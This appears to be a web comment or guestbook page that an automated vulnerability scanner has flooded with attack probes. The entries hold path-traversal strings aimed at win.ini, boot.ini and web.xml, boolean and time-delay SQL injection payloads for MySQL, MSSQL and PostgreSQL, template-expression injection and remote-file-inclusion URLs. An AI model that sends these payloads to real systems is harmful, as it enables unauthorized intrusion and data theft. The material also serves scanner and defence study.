\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

fwrmxvla
7/6/2017 6:04:13 AM

WEB-INF/web.xml

fwrmxvla
7/6/2017 6:04:18 AM

WEB-INF\web.xml

sknkcrdc
7/6/2017 6:07:49 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 6:07:53 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 6:07:57 AM

-1 OR 2+713-713-1=0+0+0+1 --

sknkcrdc
7/6/2017 6:08:01 AM

-1 OR 3+713-713-1=0+0+0+1 --

sknkcrdc
7/6/2017 6:08:04 AM

-1 OR 3*2<(0+5+713-713) --

sknkcrdc
7/6/2017 6:08:10 AM

-1 OR 3*2>(0+5+713-713) --

sknkcrdc
7/6/2017 6:08:14 AM

-1 OR 2+946-946-1=0+0+0+1

sknkcrdc
7/6/2017 6:08:19 AM

-1 OR 3+946-946-1=0+0+0+1

sknkcrdc
7/6/2017 6:08:29 AM

-1 OR 3*2<(0+5+946-946)

sknkcrdc
7/6/2017 6:08:34 AM

-1 OR 3*2>(0+5+946-946)

sknkcrdc
7/6/2017 6:08:42 AM

-1' OR 2+57-57-1=0+0+0+1 --

sknkcrdc
7/6/2017 6:08:46 AM

-1' OR 3+57-57-1=0+0+0+1 --

sknkcrdc
7/6/2017 6:08:50 AM

-1' OR 3*2<(0+5+57-57) --

sknkcrdc
7/6/2017 6:08:53 AM

-1' OR 3*2>(0+5+57-57) --

fwrmxvla
7/6/2017 6:08:56 AM

../../../../../../../../../../windows/win.ini

sknkcrdc
7/6/2017 6:08:58 AM

-1' OR 2+289-289-1=0+0+0+1 or 'PKW2XMCN'='

sknkcrdc
7/6/2017 6:09:03 AM

-1' OR 3+289-289-1=0+0+0+1 or 'PKW2XMCN'='

fwrmxvla
7/6/2017 6:09:09 AM

../../../../../../../../../../boot.ini

fwrmxvla
7/6/2017 6:09:13 AM

../../../../../../../../../../windows/win.ini.jpg

sknkcrdc
7/6/2017 6:09:15 AM

-1' OR 3*2<(0+5+289-289) or 'PKW2XMCN'='

fwrmxvla
7/6/2017 6:09:19 AM

������������������������������������������������windows��win.ini

fwrmxvla
7/6/2017 6:09:25 AM

................windowswin.ini

fwrmxvla
7/6/2017 6:09:29 AM

..\..\..\..\..\..\..\..\windows\win.ini

sknkcrdc
7/6/2017 6:09:35 AM

-1' OR 3*2>(0+5+289-289) or 'PKW2XMCN'='

fwrmxvla
7/6/2017 6:09:38 AM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

sknkcrdc
7/6/2017 6:09:43 AM

-1" OR 2+268-268-1=0+0+0+1 --

fwrmxvla
7/6/2017 6:09:45 AM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

fwrmxvla
7/6/2017 6:09:52 AM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

sknkcrdc
7/6/2017 6:09:58 AM

-1" OR 3+268-268-1=0+0+0+1 --

fwrmxvla
7/6/2017 6:10:01 AM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

sknkcrdc
7/6/2017 6:10:02 AM

-1" OR 3*2<(0+5+268-268) --

sknkcrdc
7/6/2017 6:10:07 AM

-1" OR 3*2>(0+5+268-268) --

fwrmxvla
7/6/2017 6:10:12 AM

WEB-INF/web.xml

fwrmxvla
7/6/2017 6:10:19 AM

WEB-INF\web.xml

sknkcrdc
7/6/2017 6:10:31 AM

if(now()=sysdate(),sleep(44),0)/*'XOR(if(now()=sysdate(),sleep(44),0))OR'"XOR(if(now()=sysdate(),sleep(44),0))OR"*/

sknkcrdc
7/6/2017 6:10:54 AM

(select(0)from(select(sleep(44)))v)/*'+(select(0)from(select(sleep(44)))v)+'"+(select(0)from(select(sleep(44)))v)+"*/

sknkcrdc
7/6/2017 6:10:57 AM

1 waitfor delay '0:0:66' --

sknkcrdc
7/6/2017 6:11:04 AM

aFEmhQvO'; waitfor delay '0:0:66' --

sknkcrdc
7/6/2017 6:11:08 AM

iaTQPiwV'); waitfor delay '0:0:66' --

sknkcrdc
7/6/2017 6:11:12 AM

hA1GheRM')); waitfor delay '0:0:66' --

sknkcrdc
7/6/2017 6:11:15 AM

Pyp5NDFB';select pg_sleep(66); --

sknkcrdc
7/6/2017 6:11:21 AM

KPOFQAPc');select pg_sleep(66); --

sknkcrdc
7/6/2017 6:11:28 AM

4z20XGHR'));select pg_sleep(22); --

uylxrvxp
7/6/2017 6:11:32 AM

${9999577+10000480}

uylxrvxp
7/6/2017 6:11:38 AM

${9999577+10000480}

uylxrvxp
7/6/2017 6:12:22 AM

${9999634+9999583}

ccjsvcpk
7/6/2017 6:12:39 AM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

ccjsvcpk
7/6/2017 6:12:58 AM

1some_inexistent_file_with_long_name.jpg

uylxrvxp
7/6/2017 6:13:01 AM

${9999984+10000392}

ccjsvcpk
7/6/2017 6:13:03 AM

Http://testasp.vulnweb.com/t/fit.txt

ccjsvcpk
7/6/2017 6:13:22 AM

http://testasp.vulnweb.com/t/fit.txt?.jpg

ccjsvcpk
7/6/2017 6:13:30 AM

testasp.vulnweb.com

uylxrvxp
7/6/2017 6:14:15 AM

${10000036+10000323}

uylxrvxp
7/6/2017 6:14:52 AM

${9999295+9999184}

uylxrvxp
7/6/2017 6:15:32 AM

${9999567+10000342}

ccjsvcpk
7/6/2017 6:15:45 AM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

uylxrvxp
7/6/2017 6:15:56 AM

${10000019+9999991}

ccjsvcpk
7/6/2017 6:16:01 AM

1some_inexistent_file_with_long_name.jpg

uylxrvxp
7/6/2017 6:16:34 AM

${9999065+9999374}

ccjsvcpk
7/6/2017 6:16:38 AM

Http://testasp.vulnweb.com/t/fit.txt

ccjsvcpk
7/6/2017 6:16:46 AM

Http://testasp.vulnweb.com/t/fit.txt

fwrmxvla
7/6/2017 6:16:57 AM

../../../../../../../../../../windows/win.ini

ccjsvcpk
7/6/2017 6:17:08 AM

http://testasp.vulnweb.com/t/fit.txt?.jpg

fwrmxvla
7/6/2017 6:17:10 AM

../../../../../../../../../../boot.ini

ccjsvcpk
7/6/2017 6:17:11 AM

testasp.vulnweb.com

fwrmxvla
7/6/2017 6:17:16 AM

../../../../../../../../../../windows/win.ini.jpg

fwrmxvla
7/6/2017 6:17:22 AM

������������������������������������������������windows��win.ini

fwrmxvla
7/6/2017 6:17:27 AM

................windowswin.ini

uylxrvxp
7/6/2017 6:17:29 AM

${9999422+10000150}

fwrmxvla
7/6/2017 6:17:42 AM

..\..\..\..\..\..\..\..\windows\win.ini

fwrmxvla
7/6/2017 6:17:48 AM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

fwrmxvla
7/6/2017 6:17:58 AM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

fwrmxvla
7/6/2017 6:18:05 AM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

fwrmxvla
7/6/2017 6:18:15 AM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

fwrmxvla
7/6/2017 6:18:27 AM

WEB-INF/web.xml

fwrmxvla
7/6/2017 6:18:31 AM

WEB-INF\web.xml

ccjsvcpk
7/6/2017 6:19:50 AM

